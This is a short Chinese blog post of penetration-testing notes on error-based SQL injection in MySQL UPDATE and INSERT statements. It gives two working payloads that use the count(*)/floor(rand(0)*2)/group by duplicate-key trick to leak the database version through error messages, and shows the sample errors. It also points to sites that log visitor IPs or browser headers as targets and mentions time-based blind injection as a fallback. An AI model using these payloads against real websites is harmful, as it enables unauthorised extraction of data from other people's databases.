update和insert报错SQL注射利用笔记

以MySQL为例,有时候运气好的话update类型的SQL注射可以直接将我们需要的内容更新到我们可见的字段里.这样比较方便,update 类型爆错注入

update web_ids set host='www.0x50sec.org' where id =1
 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b);

 

 

ERROR 1062 (23000): Duplicate entry ’15.1.41-3ubuntu12.10‘ for key ‘group_key’

insert 类型报错盲注

有的比较猥琐的网站会记录访问者的ip地址,浏览器信息等等到数据库里,有些_SERVER变量不受魔术引号控制,或者我们可以覆盖_SERVER变量的话,这类漏洞就可能发生.但是一般情况下数据只会才后台显示,不会在前台显示出来.这类漏洞运气好的话,也可以报错注射,运气不好的话就延时盲注猜解吧.

 

 

insert into web_ids(host) values
((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)));

 

ERROR 1062 (23000): Duplicate entry ’15.1.41-3ubuntu12.10‘ for key ‘group_key’

http://www.0x50sec.org/pentest/2012/06/id/1358/

文 / admin
LEAVE A REPLY

loading